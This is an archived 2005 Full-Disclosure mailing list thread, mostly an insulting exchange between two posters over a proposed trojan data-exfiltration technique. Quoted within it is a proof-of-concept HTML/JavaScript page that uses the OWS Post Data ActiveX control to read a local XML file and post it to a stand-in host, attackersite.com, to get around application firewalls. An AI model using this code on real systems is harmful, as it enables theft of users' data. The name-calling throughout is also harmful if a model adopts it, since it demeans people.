lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Thu Dec 22 17:09:51 2005
From: mail at hackingspirits.com (Debasis Mohanty)
Subject: new attack technique? using
	JavaScript+XML+OWSPost Data

Keep it up moron !!  

> oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years 
> kidder than u)

Shit !! Another several years ppl has to tolerate your stupidity till you
actuall _grow up_. 

> Tell me one thing, a Windows XP + Offfice XP + Internet explorer 
> combination so rare ?

Is this a new topic ?? I mean are you done with your firewall and some
weired trojan design :P


- D


-----Original Message-----
From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of Gaurav Kumar
Sent: Thursday, December 22, 2005 10:23 PM
To: Debasis Mohanty
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [Full-disclosure] new attack technique? using
JavaScript+XML+OWSPost Data

typo- i am 22 and YOU ARE 27, so i am 5 years kidder than u.

On 12/22/05, Gaurav Kumar <gaurav@...urebox.org> wrote:
> oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years 
> kidder than u)
>
> The _real_ thing is that I proved the point.
> U told win xp will give access denied error. I proved u wrong with the 
> proof attached.
> U told above technique wont work...i proved u wrong.
> Tell me one thing, a Windows XP + Offfice XP + Internet explorer 
> combination so rare ?
>
> Is that all making ur ego shattered?
>
> ...and u are no one to decide what should one disuss on this list.
>
> regards,
> gaurav
>
>
>
> On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> > Kid,
> > Although I normally don't reply to such frivilous and lame 
> > statements but your reply has seriously piss me off.. So dropping 
> > few lines, perhaps will help you grow up !!
> >
> > -----Original Message-----
> > >> From: Gaurav Kumar brazenly wrote:
> >
> > >> Looks like u need to read again what i wrote. I didnt use the 
> > >> word
> > 'spread'.
> >
> > I don't have to !! I can still remember your priceless statements 
> > [1] + [2]
> > -
> >
> > [1] A Trojan has been to be placed in a system running an 
> > application [1] firewall like Zone Alarm Pro etc.
> >
> > [2] The target system must be having office XP and the user has to 
> > be [2] lured to view a webpage hosted by attacker.
> >
> >
> > ROFL !! May be you could just ask your l33t victim to send you his 
> > passwords and other info by email :P Don't forget to send him your 
> > l33t email ID - '@...urebox.org'
> >
> >
> > >> [3] Moreover, u need not know if the target system is running ZA 
> > >> or
> > not...
> > >> [3] "the technique works even if firewall is not installed".
> >
> > >> [4] I am discussing a possible 'design' of a trojan here, "doesnt 
> > >> matter
> > is ZA
> > >> [4] or any other FW is running on client".
> >
> > Looking at statement [3] & [4], (especially the statement within 
> > double
> > quotes) just made me believe that you don't know what your are 
> > talking about unless you want to look like an idiot.
> >
> >
> > >> really? ever heard of IE exploits?
> >
> > Priceless !!
> >
> >
> > >> Well..Exactly! i would suggest u read the 'assumptions' first, 
> > >> its an assumption that user will click yes to warning...like most
'normal'
> > users do.
> >
> > Yet another priceless statement... Maybe you could just ask your 
> > l33t victim to click 'yes' to your l33t piece of code trying to 
> > download some l33t piece of shit which will fail to run and die like an
idiot.
> >
> >
> > I am sure you have enough l33t skills to strick back to keep your 
> > ego up2date however, I wud rather suggest if you have only your 
> > stupidity to share then feel free to take it offline and don't piss 
> > off everyone in this list. I would welcome you if you really want to 
> > strike back with some _serious_ technical stuff. (Note: make a note 
> > of _serious_ in the statement)
> >
> > - D
> >
> >
> >
> >
> > -----Original Message-----
> > From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of 
> > Gaurav Kumar
> > Sent: Thursday, December 22, 2005 8:52 AM
> > To: Debasis Mohanty
> > Cc: full-disclosure@...ts.grok.org.uk; websecurity@...appsec.org
> > Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack technique?
> > using JavaScript+XML+OWSPost Data
> >
> > On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> > > -----Original Message-----
> > > From: Gaurav Kumar
> > > Sent: Wednesday, December 21, 2005 8:59 PM
> > > To: full-disclosure@...ts.grok.org.uk
> > > Cc: websecurity@...appsec.org
> > > Subject: [Full-disclosure] new attack technique? using
> > > JavaScript+XML+OWSPost Data
> > >
> > > 1>> A Trojan has been to be placed in a system running an 
> > > 1>> application firewall like Zone Alarm Pro etc.
> > >
> > > >> Assumptions:
> > >
> > > 2>> The target system must be having office XP and the user has to 
> > > 2>> be lured to view a webpage hosted by attacker.
> > >
> > > 3>> The Trojan can be designed to generate an xml file which will 
> > > 3>> contain the data to be sent out. The attacker will lure
> > > the
> > > 3>> user to visit a website hosted by him.
> > >
> > > Lol !! In a practical scenario, the attacker who spreads the 
> > > worm/trojans himself is not aware in the initial stage which are 
> > > the infected machines unless the trojan sends back the 
> > > machine/user info back to the attacker. Now as you have already 
> > > mentioned ZA is running then no data can be sent back to the 
> > > attacker. So the attacker is clueless
> > which are those infected machines.
> >
> > Looks like u need to read again what i wrote. I didnt use the word
'spread'.
> > Moreover, u need not know if the target system is running ZA or 
> > not...the technique works even if firewall is not installed. I am 
> > discussing a possible 'design' of a trojan here, doesnt matter is ZA 
> > or any other FW is running on client.
> >
> > > So the case of luring the user to visit the link is out of scope...
> >
> > really? ever heard of IE exploits?
> >
> > >
> > > >> The site can have following HTML code-
> > >
> > > Now coming back to technical stuff, You are trying to access a 
> > > local file which will only be allowed if the site is in "Trusted 
> > > Sites" or "Local Intranet" or "Local Security Zone" and activex not
marked safe.
> > > The fact that *the client is also the server* is irrelevant.
> > >
> > > Try uploading the script to some webserver and give a html 
> > > extention; it will throw an _access denied_ error when the page 
> > > loads (even on Win XP + SP1).
> > >
> > > In case of any server side extention like *.asp, *.jsp etc, the 
> > > user will be prompted that an malicious component is trying to 
> > > load and ask for user permission.
> > >
> > >
> > > >> <html>
> > > >> <body>
> > > >> The author is not responsible for any misuse, this PoC is for 
> > > >> educational purpose only.
> > > >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > > >> id="exp">
> > > >> </object>
> > > >> <script LANGUAGE=javascript>
> > > >> var xmlDoc
> > > >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > > >> xmlDoc.async=false;
> > > >> xmlDoc.load("c:\\note.xml");
> > > >> xmlObj=xmlDoc.documentElement;
> > > >> var a= xmlObj.firstChild.text;
> > > >> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > > >> </script>
> > > >> </body>
> > > >> </html>
> > >
> > >
> > > >> The above code (works well on windows XP SP2) essentials calls 
> > > >> "OWS Post Data" COM control to post the contents of note.xml 
> > > >> (generated by trojan) to attackersite.com
> > >
> > > IMHO, never conduct such tests in a "Intranet Zone" or "Local Zone"
> > > and draw conclusion about "Internet Security Zone".
> > >
> > > You may also link to know about this issue - 
> > > http://support.microsoft.com/kb/317244/EN-US/
> > >
> > >
> > > >>> Essentially, the technique is breaking the basic functionality 
> > > >>> of application firewalls by using OWS Post Data as bridge for 
> > > >>> sending out the data using Javascript and XML.
> > >
> > > Not Exactly !! I wud rather suggest you to do a little more 
> > > research and draw any conclusion. Keep those _Security Zones_ in 
> > > mind before you post anything...
> >
> > Well..Exactly! i would suggest u read the 'assumptions' first, its 
> > an assumption that user will click yes to warning...like most 'normal'
> > users do.
> > >
> > >
> > > - D
> >
> >
> >
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ